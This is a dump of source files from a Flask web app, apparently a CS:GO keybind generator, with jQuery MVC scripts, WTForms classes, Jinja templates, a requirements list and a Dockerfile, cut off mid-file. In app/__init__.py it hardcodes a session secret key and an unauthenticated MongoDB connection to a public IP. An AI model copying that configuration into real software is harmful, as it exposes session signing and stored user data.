"ae6f1f12b5734ed107a886f989642a3d25691886", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 12144, "license_type": "permissive", "max_line_length": 106, "num_lines": 333, "path": "/app/static/js/keybind/models.js", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "var models = {};\n\nmodels.genData = function(){\n function init(){ \n setItemPairings(itemPairings);\n };\n \n function Key(b, dn, cc, t){\n this.bind = b;\n this.displayName = dn;\n this.command = cc;\n this.type = t;\n this.hasBinds = false;\n this.itemBinds = {\n primary: {\n max: 1,\n selected: [],\n pairings: [],\n },\n secondary: {\n max: 1,\n selected: [],\n pairings: [],\n },\n grenades: {\n max: 4,\n selected: [],\n pairings: [],\n },\n equipment: {\n max: 999,\n selected: [],\n pairings: [],\n },\n };\n };\n \n var keys = {\n kpDivide: new Key('kpDivide','/','kp_slash', 'kp'),\n kpMultiply: new Key('kpMultiply','*','kp_multiply', 'kp'),\n kpSubtract: new Key('kpSubtract','-','kp_minus', 'kp'),\n kp7: new Key('kp7','7','kp_7', 'kp'),\n kp8: new Key('kp8','8','kp_8', 'kp'),\n kp9: new Key('kp9','9','kp_9', 'kp'),\n kpAdd: new Key('kpAdd','+','kp_plus', 'kp'),\n kp4: new Key('kp4','4','kp_4', 'kp'),\n kp5: new Key('kp5','5','kp_5', 'kp'),\n kp6: new Key('kp6','6','kp_6', 'kp'),\n kp1: new Key('kp1','1','kp_1', 'kp'),\n kp2: new Key('kp2','2','kp_2', 'kp'),\n kp3: new Key('kp3','3','kp_3', 'kp'),\n kpEnter: new Key('kpEnter','Enter','kp_enter', 'kp'),\n kp0: new Key('kp0','0','kp_0', 'kp'),\n kpDecimal: new Key('kpDecimal','.','kp_del', 'kp'),\n\n f1: new Key('f1', 'F1', 'f1', 'sk'),\n f2: new Key('f2', 'F2', 'f2', 'sk'),\n f3: new Key('f3', 'F3', 'f3', 'sk'),\n f4: new Key('f4', 'F4', 'f4', 'sk'),\n f5: new Key('f5', 'F5', 'f5', 'sk'),\n f6: new Key('f6', 'F6', 'f6', 'sk'),\n f7: new Key('f7', 'F7', 'f7', 'sk'),\n f8: new Key('f8', 'F8', 'f8', 'sk'),\n f9: new Key('f9', 'F9', 'f9', 'sk'),\n f10: new Key('f10', 'F10', 'f10', 'sk'),\n f11: new Key('f11', 'F11', 'f11', 'sk'),\n f12: new Key('f12', 'F12', 'f12', 'sk'),\n };\n \n function Item(b, dn, cc, c, p, dns){\n this.bind = b;\n this.displayName = dn;\n this.command = cc;\n this.category = c;\n this.price = p;\n this.pairings = [];\n this.displayNameShort = dns;\n };\n \n var items = {\n mac10: new Item('mac10','MAC 10','mac10','primary',1050, 'MAC 10'),\n mp9: new Item('mp9','Mp9','mp9','primary',1250, 'Mp9'),\n ump45: new Item('ump45','UMP 45','ump45','primary',1200, 'UMP 45'),\n bizon: new Item('bizon','PP Bizon','bizon','primary',1400, 'PP Bizon'),\n mp7: new Item('mp7','Mp7','mp7','primary',1700, 'Mp7'),\n p90: new Item('p90','P90','p90','primary',2350, 'P90'),\n sawedoff: new Item('sawedoff','Sawed Off','sawedoff','primary',1200, 'Sawed Off'),\n mag7: new Item('mag7','MAG-7','mag7','primary',1800, 'MAG-7'),\n nova: new Item('nova','Nova','nova','primary',1200, 'Nova'),\n xm1014: new Item('xm1014','XM1014','xm1014','primary',2000, 'XM1014'),\n m249: new Item('m249','M249','m249','primary',5200, 'M249'),\n negev: new Item('negev','Negev','negev','primary',5700, 'Negev'),\n galil: new Item('galil','Galil AR','galilar','primary',2000, 'Galil AR'),\n famas: new Item('famas','FAMAS','famas','primary',2250, 'FAMAS'),\n ak47: new Item('ak47','AK-47','ak47','primary',2700, 'AK-47'),\n m4a4: new Item('m4a4','M4A4','m4a1','primary',3100, 'M4A4'),\n m4a1s: new Item('m4a1s','M4A1-S','m4a1','primary',3100, 'M4A1-S'),\n sg553: new Item('sg553','Sg 553','sg556','primary',3000, 'Sg 553'),\n aug: new Item('aug','AUG','aug','primary',3300, 'AUG'),\n scout: new Item('scout','SSG 08','ssg08','primary',1700, 'SSG 08'),\n awp: new Item('awp','AWP','awp','primary',4750, 'AWP'),\n g3sg1: new Item('g3sg1','G3SG1','g3sg1','primary',5000, 'G3SG1'),\n scar20: new Item('scar20','SCAR 20','scar20','primary',5000, 'SCAR 20'),\n glock18: new Item('glock18','Glock 18','glock','secondary',200, 'Glock 18'),\n p2000: new Item('p2000','P2000','hkp2000','secondary',200, 'P2000'),\n usps: new Item('usps','Usp-S','hkp2000','secondary',200, 'USP-S'),\n p250: new Item('p250','P250','p250','secondary',300, 'P250'),\n tec9: new Item('tec9','TEC 9','tec9','secondary',500, 'TEC 9'),\n fiveSeven: new Item('fiveSeven','Five Seven','fiveseven','secondary',500, 'Five Seven'),\n dualies: new Item('dualies','Dual Berettas','elite','secondary',500, 'Dualies'),\n cz75: new Item('cz75','CZ 75','cz75','secondary',500, 'CZ 75'),\n deagle: new Item('deagle','Desert Eagle','deagle','secondary',700, 'Deagle'),\n r8: new Item('r8','R8 Revolver','deagle','secondary',850, 'R8'),\n decoy: new Item('decoy','Decoy Grenade','decoy','grenades',50, 'Decoy'),\n flash: new Item('flash','Flashbang','flashbang','grenades',200, 'Flashbang'),\n smoke: new Item('smoke','Smoke Grenade','smokegrenade','grenades',300, 'Smoke'),\n he: new Item('he','HE Grenade','hegrenade','grenades',300, 'HE'),\n molotov: new Item('molotov','Molotov','molotov','grenades',400, 'Molotov'),\n incendiary: new Item('incendiary','Incendiary Grenade','incgrenade','grenades',400, 'Incendiary'),\n kit: new Item('kit','Defuse Kit','defuser','equipment',400, 'Defuse Kit'),\n zeus: new Item('zeus','Zeus x27','taser','equipment',400, 'Zeus x27'),\n vest: new Item('vest','Kevlar Vest','vest','equipment',600, 'Vest'),\n vesthelm: new Item('vesthelm','Vest + Helmet','vesthelm','equipment',1000, 'Vest/Helmet'),\n };\n \n var itemPairings = {\n mac10: ['mp9'],\n mp9: ['mac10'],\n sawedoff: ['mag7'],\n mag7: ['sawedoff'],\n galil: ['famas'],\n famas: ['galil'],\n ak47: ['m4a4', 'm4a1s'],\n m4a4: ['m4a1s', 'ak47'],\n m4a1s: ['m4a4', 'ak47'],\n sg553: ['aug'],\n aug: ['sg553'],\n g3sg1: ['scar20'],\n scar20: ['g3sg1'],\n glock18: ['p2000', 'usps'],\n p2000: ['usps', 'glock18'],\n usps: ['p2000', 'glock18'],\n tec9: ['cz75', 'fiveSeven'],\n fiveSeven: ['cz75', 'tec9'],\n cz75: ['tec9', 'fiveSeven'],\n deagle: ['r8'],\n r8: ['deagle'],\n molotov: ['incendiary'],\n incendiary: ['molotov'],\n };\n \n function setItemPairings(data){\n for (var key in data){\n for (var i=0; i<data[key].length; i++){\n items[key].pairings.push(items[data[key][i]]);\n };\n };\n };\n \n \n function bindItem(keyName, itemName){ \n var item = items[itemName];\n var key = keys[keyName];\n var category = item.category;\n var binds = key.itemBinds;\n var bindCategory = binds[category];\n \n function bindPairings(){\n for (var i=0; i< item.pairings.length; i++){\n bindCategory.pairings.push(item.pairings[i]);\n };\n }; \n \n if (bindCategory.max === 1){\n bindCategory.selected = [];\n bindCategory.pairings = [];\n }\n else if (category === 'grenades'){\n var flashCount = 0;\n \n for (var i=0; i<bindCategory.selected.length; i++){\n if (item === items.flash){\n if (bindCategory.selected[i] === item){\n flashCount++;\n if (flashCount > 1){return};\n };\n } \n else {\n if (bindCategory.selected[i] === item){return};\n };\n };\n \n for (var i=0; i<bindCategory.pairings.length; i++){\n if (bindCategory.pairings[i] === item){return};\n };\n \n if (bindCategory.selected.length >= bindCategory.max){return}\n }\n else if (category === 'equipment'){\n for (var i=0; i<bindCategory.selected.length; i++){\n if (bindCategory.selected[i] === item){return};\n };\n \n for (var i=0; i<bindCategory.pairings.length; i++){\n if (bindCategory.pairings[i] === item){return};\n };\n };\n \n if (itemName === 'molotov'){bindCategory.selected.push(item)}\n else {bindCategory.selected.unshift(item)};\n bindPairings();\n key.hasBinds = true;\n pubsub.emit('itemBound', getBinds(keyName));\n };\n \n function unbindItem(keyName, itemName){\n var key = keys[keyName];\n var item = items[itemName];\n var category = item.category;\n var selected = key.itemBinds[category].selected;\n var pairings = key.itemBinds[category].pairings;\n \n for (var i=0; i<selected.length; i++){\n if (selected[i] === item){\n selected.splice(i, 1);\n pubsub.emit('itemUnbound');\n \n if (item.pairings.length > 0){\n key.itemBinds[category].pairings = [];\n pubsub.emit('itemUnbound');\n };\n };\n };\n \n for (var i=0; i<pairings.length; i++){\n if (pairings[i] === item){\n pairings.splice(i, 1);\n pubsub.emit('itemUnbound');\n };\n };\n \n for (var cat in key.itemBinds){\n for (var group in key.itemBinds[cat]){\n if (key.itemBinds[cat][group].length > 0){return};\n };\n };\n \n unbindAllItems(keyName);\n };\n \n function unbindAllItems(keyName){\n var key = keys[keyName];\n var binds = key.itemBinds;\n \n for (var category in binds){\n binds[category].selected = [];\n binds[category].pairings = [];\n };\n \n key.hasBinds = false; \n pubsub.emit('itemUnbound');\n }; \n \n function unbindAllKeys(type){\n for (var key in keys){\n if (keys[key].type === type){\n unbindAllItems(key);\n };\n };\n \n if (type === 'kp') {\n pubsub.emit('unboundAllKeysKp');\n } else {\n pubsub.emit('unboundAllKeysSk');\n };\n };\n \n function getKeysWithBinds(type){\n var keysWithBinds = [];\n \n for (var key in keys){\n if (keys[key].type === type && keys[key].hasBinds){\n keysWithBinds.push(keys[key]);\n };\n };\n \n return keysWithBinds\n };\n \n function getBinds(keyName){\n var key = keys[keyName];\n var binds = key.itemBinds;\n var allBinds = [];\n \n for (var category in binds){\n for (var group in binds[category]){\n if (Array.isArray(binds[category][group])){\n for (var i=0; i<binds[category][group].length; i++){\n allBinds.push(binds[category][group][i]);\n };\n };\n };\n };\n \n return allBinds\n };\n \n function getAllBinds(){\n var binds = {}, thisKey, thisKeyBinds;\n \n for (var key in keys){\n thisKey = keys[key];\n \n if (thisKey.hasBinds){\n binds[thisKey.bind] = {};\n binds[thisKey.bind].name = thisKey.command;\n binds[thisKey.bind].items = [];\n thisKeyBinds = getBinds(thisKey.bind);\n \n for (var i=0; i<thisKeyBinds.length; i++){\n binds[thisKey.bind].items.push(thisKeyBinds[i].command);\n };\n };\n };\n \n return binds\n };\n \n return {\n init, keys, items, getKeysWithBinds, bindItem, getBinds, unbindItem,\n unbindAllItems, unbindAllKeys, getAllBinds\n }\n};" }, { "alpha_fraction": 0.507260262966156, "alphanum_fraction": 0.5082191824913025, "avg_line_length": 26.866413116455078, "blob_id": "ade70ae4e0ee19b2d65e12f25347eed3f4bd86e0", "content_id": "f0ca5a9f890a4113380c318bbe3c9b87c91863d5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 7300, "license_type": "permissive", "max_line_length": 74, "num_lines": 262, "path": "/app/static/js/keybind/controllers.js", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "var control = {};\n\ncontrol.generator = function(){\n var model = models.genData();\n var selectedKey = 'kpDivide';\n model.init();\n \n (function vHeader(){\n var view = views.header;\n view.cacheDom();\n \n function resetAll(){\n model.unbindAllKeys('kp');\n model.unbindAllKeys('sk');\n };\n \n view.btnResetAll.click(function(){\n resetAll();\n });\n }());\n \n (function vGenContainer(){\n var view = views.genContainer;\n \n view.cacheDom();\n\n view.btnKpGen.click(function(){\n view.hideSkGen();\n view.showKpGen();\n });\n\n view.btnSkGen.click(function(){\n view.hideKpGen();\n view.showSkGen();\n });\n }());\n \n (function vKpGen(){\n var view = views.kpGen;\n var vOverlay = views.overlay;\n \n view.cacheDom();\n view.appendKeys(model.keys);\n \n function updateView(){\n view.markBoundKeys(model.getKeysWithBinds('kp'));\n };\n\n function openOverlay(thisKey){\n vOverlay.show(model.keys[thisKey].displayName);\n vOverlay.renderItems(model.getBinds(selectedKey));\n };\n \n pubsub.listen('itemBound', updateView);\n pubsub.listen('itemUnbound', updateView);\n pubsub.listen('unboundAllKeysKp', updateView);\n \n view.kpKeys.click(function(){\n var thisKey = $(this).attr('bind'); \n selectedKey = thisKey;\n openOverlay(thisKey);\n });\n \n view.btnKpClear.click(function(){\n model.unbindAllKeys('kp');\n });\n }());\n \n (function vSkGen(){\n var view = views.skGen;\n var vOverlay = views.overlay;\n var addedKeys = [];\n\n view.cacheDom();\n view.appendKeySelector(model.keys);\n\n function updateView(){\n for (var i = 0; i < addedKeys.length; i++){\n view.addBinds(model.getBinds(addedKeys[i]), addedKeys[i]);\n };\n };\n\n function openOverlay(thisKey){\n vOverlay.show(model.keys[thisKey].displayName);\n vOverlay.renderItems(model.getBinds(selectedKey));\n };\n\n function addBindsBox(key){\n for (var i = 0; i < addedKeys.length; i++){\n if (addedKeys[i] === key){return};\n };\n\n view.addBindsBox(model.keys[key]);\n addedKeys.push(key);\n };\n\n function removeBindsBox(box){\n view.removeBindsBox(box);\n\n for (var i = 0; i < addedKeys.length; i++){\n if (addedKeys[i] === box.attr('bind')){\n addedKeys.splice(i, 1);\n };\n };\n };\n\n function removeAllBindsBoxes(){\n view.removeAllBindsBoxes();\n addedKeys = [];\n };\n\n pubsub.listen('itemBound', updateView);\n pubsub.listen('itemUnbound', updateView);\n pubsub.listen('unboundAllKeysSk', removeAllBindsBoxes);\n\n view.keySelector.on('change', function(){\n var thisKey = $(this).find(':selected').attr('bind');\n addBindsBox(thisKey);\n });\n\n view.selectedKeys.on('click', '.js-skKey', function(){\n var thisKey = $(this);\n var thisBox = thisKey.parents('.js-bindsBox');\n\n model.unbindAllItems(thisBox.attr('bind'));\n removeBindsBox(thisBox);\n });\n\n view.btnSkClear.click(function(){\n view.removeAllBindsBoxes();\n model.unbindAllKeys('sk');\n addedKeys = [];\n });\n\n view.selectedKeys.on('click', '.js-btn-addBinds', function(){\n var thisKey = $(this).parents('.js-bindsBox').attr('bind');\n selectedKey = thisKey;\n openOverlay(thisKey);\n });\n\n view.selectedKeys.on('click', '.js-item', function(){\n var thisKey = $(this).parents('.js-bindsBox').attr('bind');\n var thisItem = $(this).attr('bind');\n model.unbindItem(thisKey, thisItem);\n });\n }());\n\n (function vOverlay(){\n var view = views.overlay;\n var vKpGen = views.kpGen;\n var vSkGen = views.skGen;\n var addedThisSession = [];\n var deletedThisSession = [];\n\n view.cacheDom();\n view.appendDropMenus(model.items);\n\n function closeOverlay(){\n view.hide();\n };\n\n function updateView(){\n view.renderItems(model.getBinds(selectedKey));\n };\n\n function clearItemMem(){\n addedThisSession = [];\n deletedThisSession = [];\n };\n\n function rememberAdded(item){\n addedThisSession.push(item);\n };\n\n function forgetAdded(){\n var thisItem;\n for (var i=0; i<addedThisSession.length; i++){\n thisItem = addedThisSession[i];\n model.unbindItem(selectedKey, thisItem);\n };\n };\n\n function rememberDeleted(item){\n deletedThisSession.push(item);\n };\n\n function rememberCleared(){\n for (var i=0; i < view.loItems.length; i++){\n deletedThisSession.push($(view.loItems[i]).attr('bind'));\n };\n };\n\n function forgetDeleted(){\n var thisItem;\n for (var i=0; i<deletedThisSession.length; i++){\n thisItem = deletedThisSession[i];\n model.bindItem(selectedKey, thisItem);\n };\n };\n\n pubsub.listen('itemBound', updateView);\n pubsub.listen('itemUnbound', updateView);\n pubsub.listen('unboundAllKeys', updateView);\n\n view.dark.click(function(){\n view.hide();\n });\n \n view.dropSelectors.click(function(){\n var thisSelector = $(this).attr('bind');\n view.toggleDropMenu(thisSelector);\n });\n\n view.loadOut.click(function(){\n view.hideDropMenus();\n });\n \n view.menuItems.click(function(){\n var thisItem = $(this).attr('bind');\n \n rememberAdded(thisItem);\n model.bindItem(selectedKey, thisItem);\n });\n \n view.btnOlAccept.click(function(){\n view.hide();\n });\n \n view.btnOlCancel.click(function(){\n forgetAdded();\n forgetDeleted();\n view.hide();\n });\n \n view.btnOlClear.click(function(){\n rememberCleared();\n model.unbindAllItems(selectedKey);\n });\n \n view.loadOut.on('click', '.js-items img', function(){\n var thisItem = $(this).attr('bind'); \n rememberDeleted(thisItem); \n model.unbindItem(selectedKey, thisItem);\n });\n }());\n \n (function vBindsOutput(){\n var view = views.bindsOutput;\n \n view.cacheDom();\n \n function updateView(){\n view.renderBinds(model.getAllBinds());\n };\n \n pubsub.listen('itemBound', updateView);\n pubsub.listen('itemUnbound', updateView);\n pubsub.listen('unboundAllKeys', updateView);\n }());\n};\n\ncontrol.generator();" }, { "alpha_fraction": 0.6766666769981384, "alphanum_fraction": 0.7099999785423279, "avg_line_length": 24, "blob_id": "8b66e108099d28b60f3920a9d2f3a1d6c5d761b3", "content_id": "fc73cfb80ecd372a297172638a5201eb2c44deb7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 300, "license_type": "permissive", "max_line_length": 68, "num_lines": 12, "path": "/app/__init__.py", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "# coding: utf-8\n\nfrom flask import Flask, render_template, url_for, redirect, session\nfrom pymongo import MongoClient\n\napp = Flask(__name__)\nmongo = MongoClient(host='104.194.64.27')\ndb = mongo['csgo']\napp.config['CSRF_ENABLED'] = True\napp.config['SECRET_KEY'] = 'ckddskslksdsdkj'\n\nfrom app import views, forms\n" }, { "alpha_fraction": 0.6020816564559937, "alphanum_fraction": 0.627301812171936, "avg_line_length": 29.108434677124023, "blob_id": "6f7b43f2d917d3adcec3558478a83ddca27d12ef", "content_id": "18c8e8c38ac6928730d78fd6bafe5be499eb1c1a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2958, "license_type": "permissive", "max_line_length": 74, "num_lines": 83, "path": "/app/forms.py", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "# coding: utf-8\n\nfrom flask_wtf import Form\nfrom wtforms import StringField, PasswordField, TextAreaField, SelectField\nfrom wtforms.validators import required, email, length, equal_to\n\nclass register_form(Form):\n username = StringField('username', validators=[\n required(message='请输入用户名'),\n length(max=20, message='用户名不能大于20位'),\n length(min=4, message='用户名不能小于4位')\n ])\n\n password = PasswordField('password', validators=[\n required(message='请输入密码'),\n length(max=20, message='密码不能大于20位'),\n length(min=4, message='密码不能小于4位')\n ])\n\n repassword = PasswordField('repassword', validators=[\n required(message='请输入确认密码'),\n length(max=20, message='确认密码不能大于20位'),\n length(min=4, message='确认密码不能小于4位'),\n equal_to('password', message='密码和确认密码不一致')\n ])\n\n email = StringField('email', validators=[\n required(message='请输入邮箱'),\n email(message='邮箱格式不正确')\n ])\n\nclass login_form(Form):\n username = StringField('username', validators=[\n required(message='请输入用户名'),\n length(max=20, message='用户名不能大于20位'),\n length(min=4, message='用户名不能小于4位')\n ])\n\n password = PasswordField('password', validators=[\n required(message='请输入密码'),\n length(max=20, message='密码不能大于20位'),\n length(min=4, message='密码不能小于4位')\n ])\n\nclass admin_login_form(Form):\n username = StringField('admin_username', validators=[\n required(message='请输入用户名'),\n length(max=20, message='用户名不能大于20位'),\n length(min=4, message='用户名不能小于4位')\n ])\n\n password = PasswordField('admin_password', validators=[\n required(message='请输入密码'),\n length(max=20, message='密码不能大于20位'),\n length(min=4, message='密码不能小于4位')\n ])\n\nclass admin_article_form(Form):\n title = StringField('title', validators=[\n required(message='标题必须输入'),\n length(max=50, message='标题不能大于50字符')\n ])\n\n description = StringField('description', validators=[\n required(message='描述必须输入'),\n length(max=30, message='标题不能大于30字符')\n ])\n\n list_img = StringField('list_img', validators=[\n required(message='封面图必须输入')\n ])\n\n content = TextAreaField('content', validators=[\n required(message='内容必须输入'),\n length(max=50000, message='标题不能大于50000字符')\n ])\n\n type = SelectField('type', choices=[('1', '文章'), ('2', '视频')])\n\nclass comment_add_form(Form):\n content = TextAreaField('content', validators=[\n required(message='请输入评论内容')\n ])" }, { "alpha_fraction": 0.4057970941066742, "alphanum_fraction": 0.4057970941066742, "avg_line_length": 26.625, "blob_id": "400a79316a1073e69bbb43fbe5c85a8a5f2793fc", "content_id": "b3395cc9653babe4a3a3a9dc5a634924bb673811", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1152, "license_type": "permissive", "max_line_length": 81, "num_lines": 40, "path": "/app/templates/user/login.html", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "{% extends 'base.html' %}\n\n{% block title %}\n 登录\n{% endblock %}\n\n{% block content %}\n <form class=\"ui form\" action=\"\" method=\"post\">\n {{ form.csrf_token }}\n {{ form.hidden_tag() }}\n\n {% if form.errors %}\n <div class=\"ui red message\">\n <div class=\"header\">\n 错误消息\n </div>\n <ul class=\"list\">\n {% for error in form.username.errors, form.password.errors %}\n {% for err in error %}\n <li>{{ err }}</li>\n {% endfor %}\n\n {% endfor %}\n </ul>\n </div>\n {% endif %}\n\n <div class=\"field\">\n <label>用户名</label>\n {{ form.username(placeholder=\"请输入用户名\") }}\n </div>\n <div class=\"field\">\n <label>密码</label>\n {{ form.password(placeholder=\"请输入密码\") }}\n </div>\n <div class=\"field\">\n <input class=\"ui fluid basic green button\" type=\"submit\" value=\"登录\">\n </div>\n </form>\n{% endblock %}" }, { "alpha_fraction": 0.489130437374115, "alphanum_fraction": 0.5, "avg_line_length": 16.571428298950195, "blob_id": "8507f654a3926ea457c52419d16c03d7c7e751f8", "content_id": "8e6cdd799f6ee293d4474985baec795ff921797e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 406, "license_type": "permissive", "max_line_length": 49, "num_lines": 21, "path": "/app/templates/404.html", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "{% extends 'base.html' %}\n\n{% block title %}\n 找不到页面\n{% endblock %}\n\n{% block content %}\n\n <h2 class=\"ui dividing header\">\n <br>\n <span>\n <i class=\"remove circle icon\"></i>\n 找不到页面(Page not found)\n </span>\n </h2>\n\n <div class=\"ui center aligned segment basic\">\n <h1>您访问的页面不存在!</h1>\n </div>\n\n{% endblock %}" }, { "alpha_fraction": 0.47560974955558777, "alphanum_fraction": 0.6951219439506531, "avg_line_length": 13.909090995788574, "blob_id": "926675a62591fb1f51611d7578729d3106125bc2", "content_id": "a87bbb7185284df258c500cedacad39031be9b40", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 164, "license_type": "permissive", "max_line_length": 18, "num_lines": 11, "path": "/requirements.txt", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "click==6.6\nFlask==0.11.1\nFlask-WTF==0.12\nitsdangerous==0.24\nJinja2==2.8\nMarkupSafe==0.23\npymongo==2.8.1\nrequests==2.10.0\nsix==1.10.0\nWerkzeug==0.11.10\nWTForms==2.1\n" }, { "alpha_fraction": 0.429824560880661, "alphanum_fraction": 0.4327485263347626, "avg_line_length": 24.370370864868164, "blob_id": "195edc155d88937622eefecfb812b200d9470318", "content_id": "4a20a6b4b5dc7b80e4f41fdfd89c7709bffeb1e2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 684, "license_type": "permissive", "max_line_length": 58, "num_lines": 27, "path": "/app/static/js/keybind/pubsub.js", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "var pubsub = {\n channels: {},\n \n listen: function(event, fn){\n this.channels[event] = this.channels[event] || [];\n this.channels[event].push(fn);\n },\n \n unlisten: function(event, fn){\n if (this.channels[event]){\n for (var i=0; i<this.channels[event]; i++){\n if (this.channels[event][i] === fn){\n this.channels[event].splice[i, 1];\n break;\n };\n };\n };\n },\n \n emit: function(event, data){\n if (this.channels[event]){\n this.channels[event].forEach(function(fn){\n fn(data);\n });\n };\n },\n};" }, { "alpha_fraction": 0.7591836452484131, "alphanum_fraction": 0.7755101919174194, "avg_line_length": 23.5, "blob_id": "82a42eeddf6d06f635eb75974482bbade8e496a6", "content_id": "e8a507c6c81a98daffcee5e4ce6c60f7e1d643d7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 245, "license_type": "permissive", "max_line_length": 41, "num_lines": 10, "path": "/Dockerfile", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "FROM python\nMAINTAINER MyFaith <[email protected]>\nRUN mkdir -p /app\nWORKDIR /app\nADD requirements.txt requirements.txt\nRUN pip install -r requirements.txt\nCOPY docker-entrypoint.sh /usr/local/bin/\nEXPOSE 8888\nENTRYPOINT [\"docker-entrypoint.sh\"]\nCMD [\"\"]\n" }, { "alpha_fraction": 0.5177111625671387, "alphanum_fraction": 0.5243285298347473, "avg_line_length": 28.646154403686523, "blob_id": "f38ab3f11ae1d5ac594a2f58d9bfe2c4574e64d1", "content_id": "81b9c557fb1a21763f56b85711f99b2b3b5f689c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 7723, "license_type": "permissive", "max_line_length": 215, "num_lines": 260, "path": "/app/static/js/keybind/views.js", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "var transitions = {\n show: function(el){\n el.show();\n setTimeout(function(){\n el.removeClass('is-hidden')\n }, 25);\n },\n \n hide: function(el, time){\n el.addClass('is-hidden');\n setTimeout(function(){\n el.hide();\n }, time);\n },\n \n animate: function(){},\n};\n\nvar views = {};\n\nviews.header = { \n cacheDom: function(){\n this.el = $('.js-header');\n this.btnResetAll = this.el.find('.js-btn-resetAll');\n },\n};\n\nviews.genContainer = {\n cacheDom: function(){\n this.el = $('.js-genContainer');\n this.btnKpGen = this.el.find('.js-btn-kpGen');\n this.btnSkGen = this.el.find('.js-btn-skGen');\n this.kpGen = this.el.find('.js-kpGen');\n this.skGen = this.el.find('.js-skGen');\n this.label = this.el.find('.js-genLabel');\n },\n\n updateLabel: function(text){\n this.label.html(text);\n },\n\n showKpGen: function(){\n this.hideSkGen();\n this.updateLabel('Key Pad'); \n \n setTimeout(function(){\n views.genContainer.kpGen.fadeIn(250);\n }, 250);\n },\n\n hideKpGen: function(){\n this.kpGen.fadeOut(200);\n },\n\n showSkGen: function(){\n this.hideKpGen();\n this.updateLabel('选择模式');\n\n setTimeout(function(){\n views.genContainer.skGen.fadeIn(200);\n }, 202);\n },\n\n hideSkGen: function(){\n this.skGen.fadeOut(250);\n },\n};\n\nviews.kpGen = { \n cacheDom: function(){\n this.el = $('.js-kpGen');\n this.btnKpClear = this.el.find('.js-btn-kpClear');\n this.keyPad = this.el.find('.js-keyPad');\n this.kpKeys = this.keyPad.find('.js-kpKey');\n },\n \n appendKeys: function(keysObj){\n var thisKey, div;\n \n for (var key in keysObj){\n if (keysObj[key].type === 'kp'){\n thisKey = keysObj[key];\n div = '<div class=\"key js-kpKey\" bind=\"'+thisKey.bind+'\"><span>'+thisKey.displayName+'</span></div>';\n \n this.keyPad.append(div);\n };\n };\n \n this.cacheDom();\n },\n \n markBoundKeys: function(keysArr){\n var domKey;\n this.kpKeys.removeClass('has-binds');\n \n for (var i=0; i<keysArr.length; i++){\n domKey = this.keyPad.find('.js-kpKey[bind=\"'+keysArr[i].bind+'\"]');\n domKey.addClass('has-binds');\n };\n },\n};\n\nviews.skGen = {\n cacheDom: function(){\n this.el = $('.js-skGen');\n this.btnSkClear = this.el.find('.js-btn-skClear');\n this.keySelector = this.el.find('.js-keySelector');\n this.selectedKeys = this.el.find('.js-selectedKeys');\n this.skKeys = this.el.find('.js-skKey');\n this.bindsBoxes = this.el.find('.js-bindsBox');\n this.btnAddBinds = this.el.find('.js-btn-addBinds');\n },\n\n appendKeySelector: function(keysObj){\n var option, thisKey;\n\n for (var key in keysObj){\n if (keysObj[key].type === 'sk'){\n thisKey = keysObj[key];\n option = '<option bind=\"'+thisKey.bind+'\">'+thisKey.displayName+'</option>';\n\n this.keySelector.append(option);\n };\n };\n\n this.cacheDom();\n },\n\n addBindsBox: function(key){\n var box = '<div class=\"bindsBox js-bindsBox\" bind=\"'+key.bind+'\"><div class=\"key js-skKey\" title=\"remove key\"><span>'+key.displayName+'</span></div><button class=\"js-btn-addBinds\">编辑按键</button></div>'; \n this.selectedKeys.append(box);\n var thisBox = $('.js-bindsBox[bind=\"'+key.bind+'\"]');\n thisBox.fadeIn(250).css('display', 'inline-block');\n this.keySelector.val(\"Add Key\");\n\n this.cacheDom();\n },\n\n removeBindsBox: function(box){\n this.keySelector.val(\"Add Key\");\n box.fadeOut(250);\n setTimeout(function(){box.remove()}, 255);\n },\n\n removeAllBindsBoxes: function(){\n this.keySelector.val(\"Add Key\");\n this.bindsBoxes.fadeOut(250);\n setTimeout(function(){views.skGen.bindsBoxes.remove()}, 255);\n },\n\n addBinds: function(binds, key){\n var box = this.el.find('.js-bindsBox[bind=\"'+key+'\"]');\n var item;\n box.find('.js-item').remove();\n\n for (var i = 0; i < binds.length; i++){\n item = '<div class=\"item js-item\" bind=\"'+binds[i].bind+'\" title=\"remove item\">'+binds[i].displayNameShort+'</div>';\n box.append(item);\n };\n },\n\n removeBind: function(){},\n};\n\nviews.overlay = {\n cacheDom: function(){\n this.el = $('.js-overlay');\n this.dark = $('.js-dark');\n this.keyDisplay = this.el.find('.js-keyDisplay span');\n this.btnOlAccept = this.el.find('.js-btn-olAccept');\n this.btnOlCancel = this.el.find('.js-btn-olCancel');\n this.btnOlClear = this.el.find('.js-btn-olClear');\n this.dropSelectors = this.el.find('.js-dropSelector');\n this.dropMenus = this.el.find('.js-dropMenu');\n this.menuItems = this.dropMenus.find('.js-menuItem');\n this.loadOut = this.el.find('.js-loadOut');\n this.loItems = this.loadOut.find('.js-items img');\n },\n\n appendDropMenus: 